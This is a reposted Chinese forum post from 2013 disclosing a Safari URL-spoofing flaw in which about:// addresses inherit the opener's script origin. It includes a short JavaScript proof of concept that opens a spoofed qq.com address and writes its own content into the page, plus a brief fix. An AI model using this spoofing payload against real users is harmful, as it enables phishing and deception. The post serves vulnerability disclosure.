-
-
[转帖]Safari浏览器设计不当存在URL欺骗
-
发表于:
2013-2-19 16:39
2396
-
由于某些URL协议实现的不严谨导致URL欺骗漏洞
在safari下about://xxxxxxx 会被视为一个有效资源页,而且和about:blank有同样功效,可以继承effective script origin,所以我们可以通过打开一个about://www.qq.com这样的地址来做URL欺骗.
POC:
<script>
<script>
function poc(){
var w=open('about://view.news.qq.com/zt2012/modern_times/index.htm');
w.document.body.innerHTML='I'm sogili hehehe';
}
</script>
<button onclick=poc();>clickme</button>
<button onclick=poc();>clickme</button>
修复方案:
严格限定about协议的源继承.
来源:http://www.2cto.com/Article/201302/189056.html
[课程]Linux pwn 探索篇!
